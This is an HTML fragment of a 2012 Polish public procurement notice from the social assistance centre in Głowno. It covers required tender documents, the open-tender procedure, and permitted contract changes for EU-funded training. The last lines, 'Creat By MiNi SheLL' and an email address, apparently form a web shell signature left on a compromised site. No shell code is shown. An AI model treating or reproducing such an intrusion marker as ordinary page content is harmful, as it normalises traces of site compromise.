<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne postanowienia umowne zawiera wzór umowy załączony do SIWZ 
( załącznik nr 9)
2. Zamawiający  - na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych - zastrzega sobie prawo do zmiany treści umowy wskutek wystąpienia okoliczności, których nie dało się przewidzieć na etapie postępowania o udzielenie zamówienia i na etapie podpisywania umowy lub wystąpienie których nie zależy od woli stron umowy w sprawie zamówienia publicznego, albo zmiany te są korzystne dla zamawiającego.

3. W szczególności Zamawiający ustanawia następujące warunki umożliwiające zmianę 
i zakres treści zawartej umowy:
3.1.	 Konieczność zmiany składu osobowego kadry szkolącej, może nastąpić wyłącznie za zgodą Zamawiającego, o ile Wykonawca zapewni osoby o kwalifikacjach i doświadczeniu nie niższych niż odpowiednie wymagania określone w ofercie Wykonawcy. 
3.2.	 Zamawiający zastrzega sobie prawo skierowania na każdą z form wsparcia - szkolenie mniejszej liczby osób niż wskazana w przedmiocie zamówienia. W takim wypadku, Wykonawcy przysługuje wynagrodzenie proporcjonalnie do liczby osób, które rzeczywiście wezmą udział w danej formie wsparcia - szkoleniu, spotkaniu warsztatach. Zmniejszenie liczby uczestników nie może być wyższe niż o 2 osoby.
3.3.	 Zamawiający zastrzega sobie, w zakresie szkoleń zawodowych, możliwość zmiany liczby osób uczestniczących w poszczególnych szkoleniach na zasadzie zmniejszenia liczby uczestniczących osób w jednym z zamówionych szkoleń z jednoczesnym zwiększeniem w takiej samej liczbie osób uczestniczących w innym szkoleniu. Jednak przeniesienie osób na inne szkolenia nie może przekroczy liczby 3 uczestników. Zmiana jest dopuszczalna nawet jeżeli w wyniku przeniesienia osób na inne szkolenie spowoduje rezygnację z danego szkolenia z uwagi na brak uczestników. 
W przypadku przeniesienia osób na inne szkolenie, wynagrodzenie Wykonawcy ulegnie zmianie na zasadzie obliczenia kosztu przeszkolenia jednej osoby w danym szkoleniu tj. cena za dane szkolenie wskazana w ofercie zostanie podzielona przez ilość uczestników pierwotnie wskazanych, następnie obliczona cena przeszkolenia jednego uczestnika zostanie pomnożona przez liczbę uczestników po zmianie. Obliczona cena będzie ceną za dane szkolenie w którym została zmieniona liczba osób uczestniczących.  
3.4.	 Strony mogą dokonać zmiany szczegółowych terminów realizacji form wsparcia - szkoleń określonych w harmonogramie realizacji szkoleń, w przypadku zaistnienia nowych okoliczności, niezależnych od Zamawiającego i Wykonawcy, uzasadniających zmiany tych terminów.
3.5.	 Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty w sytuacji:
a) zmiany przepisów prawa powodujących konieczność zastosowania innych rozwiązań niż zakładano w opisie przedmiotu zamówienia,
b) zmiany nazwy zadania,
c) zmiany osób reprezentujących strony w przypadku zmian w strukturach organizacyjnych stron.
3.6.	 Zamawiający dopuszcza możliwość dokonania zmian w umowie w sytuacji:
a) Zaistnienia nowych okoliczności, niezależnych od Zamawiającego i Wykonawcy, uzasadniających zmiany terminów realizacji szkoleń,
b) Zaistnienia siły wyższej mającej wpływ na realizację umowy, (za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, 
c) Zaistnienia omyłki pisarskiej lub rachunkowej,
3.7.	Wystąpienie ustawowej zmiany obowiązującej stawki podatku VAT, lub wystąpienie innych okoliczności mających wpływ na wysokość stawki podatku VAT.- dopuszcza się zmianę umówionego wynagrodzenia. W przypadku ustawowej zmiany podatku VAT 
do ceny netto zostanie naliczony podatek VAT w obowiązującej wysokości. Zmiana może dotyczyć usług  nie zapłaconych przed zmianą stawki podatku.
3.8.	 Wystąpienie warunków atmosferycznych i zdarzeń losowych, które istotnie utrudniają 
lub uniemożliwiają wykonanie usług szkoleniowych w umówiony sposób, dopuszcza się możliwość przedłużenia terminu wykonania zamówienia i innych terminów umownych
3.9.	 W przypadku usług zamiennych możliwość zmiany umówionego wynagrodzenia wynikającej z porównania rozmiaru i wartości usług szkoleniowych zamiennych z usługami pierwotnie zamówionymi z zastrzeżeniem nieprzekraczalności ceny ofertowej, która będzie stanowić maksymalną graniczną kwotę umówionego wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.glowno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Głownie , ul. Ludwika Norblina 1, 95-015 Głowno..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.07.2012 godzina 10:00, miejsce: W siedzibie Zamawiającego-Miejski Ośrodek Pomocy Społecznej w Głownie , ul. Ludwika Norblina 1, 95-015 Głowno..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenia są realizowane w ramach projektu systemowego współfinansowanego 
ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki w ramach realizacji projektu Aktywna integracja w mieście Głowno.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com